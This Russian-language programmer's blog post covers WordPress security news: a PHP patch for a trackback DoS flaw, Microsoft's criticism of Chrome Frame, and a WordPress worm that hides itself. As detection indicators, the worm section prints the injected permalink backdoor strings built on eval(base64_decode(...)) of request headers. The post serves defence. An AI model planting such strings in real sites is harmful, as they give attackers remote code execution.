Заметки одного программиста

Прошло около полутора месяцев с выхода последнего обновления WordPress, исправляющего в нем уязвимость. И вот, позавчера стало известно о новой дырке в этом популярном движке. В этот раз уязвимость найдена в файле wp-trackback.php. Уязвимость позволяет провести DoS-атаку на уязвимый блог. Новая версия (2.8.5) движка, убирающая уязвимость, уже вышла, скачать ее можно тут. Уязвимость можно пофиксить вручную. Для этого надо добавить следующие строки в файл wp-trackback.php:

function ft_stop_trackback_dos_attacks(){
       global $pagenow;
       if ( 'wp-trackback.php' == $pagenow ){
               // DoS attack fix.
               if ( isset($_POST['charset']) ){
                       $charset = $_POST['charset'];
                       if ( strlen($charset) > 50 ) {  die; }
               }
       }
}
add_action('init','ft_stop_trackback_dos_attacks');

Свежая русская версия, надо полагать, на подходе. Так что, сторонникам официальных апдейтов придется немного подождать

Microsoft считают, что новый плагин от Google для их Internet Explorer 8 делает IE менее безопасным. Плагин внедряет в IE движок рендеринга HTML и JavaScript, используемый в Google Chrome. По словам представителя Microsoft, ”Учитывая проблемы безопасности с плагинами вообще и Google Chrome в частности, работа Google Chrome Frame в качестве плагина удвоила “зону поражения” для вредоносного программного обеспечения. Мы не можем рекомендовать нашим друзьям и семьям принять такой риск.”. Интересная песня. Особенно если учесть, что движок от Google использует открытые технологии, обрабатывает HTML и JavaScript быстрее и быстрее, а также использует теги из HTML 5. К тому же, с плагином от Google, разработчики Web-приложений избавляются от необходимости прописывать условия в коде специально для движка IE, ненормальное поведение и множество уязвимостей которого уже стали притчей во языцех. Что же, устроимся по-удобнее на диване, запасемся чипсами и насладимся новым кино под названием “Мелкомягкий против империи зла”

Многие блоггеры, следящие за уровнем безопасности своих wordpress-блогов, знают, что около месяца назад была найдена уязвимость в движке WordPress, позволяющая сбросить пароль администратора блога несложным HTTP-запросом. Уязвимость актуальна для движка версии до 2.8.3 включительно. Однако немногие обновляют свои блоги своевременно. Именно на блоги таких пользователей и направлен новый WordPress-вирус. Вирус работает примерно так (мой вольный перевод)) ): регистрирует новую учетную запись пользователя, использует уязвимость для выполнения кода через структуру ЧПУ (человеко-понятные УРЛы, они же “постоянные ссылки”, они же permalinks), найденную ранее, повышает свои права до администраторских. Затем использует JavaScript для того, чтобы спрятать себя из списка пользователей. В процессе выполнения вирус спамит ваши старые посты. Далее вирус пытается почистить за собой по окончании работы.

Присутствие вируса сложно обнаружить, тем более если он ещё ничего не опубликовал. Для обнаружения нужно проверить фид permalinks/rss на присутствие кода:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))
%7D%7D|.+)&%

или ошибки

‘error on line 22 at column 71: xmlParseEntityRef: no
name wordpress’

Если такой код присутствует или фид “сломан”, то блог инфицирован. Здесь можно почитать, как избавиться от заразы, а здесь – как обновиться. Ну а вот тут – как обезопасить свой блог от “набегов” подобной гадости))

Заказали мне сделать интернет-магазин. Сижу вот, копаюсь в смрадных завалах поисковых запросов, ищу бесплатный движок для этого дела. Пока ничего не нашел толкового –  приходится разбавлять поиски работой в офисе)). Как что-нибудь подыщу, выложу обзорчик).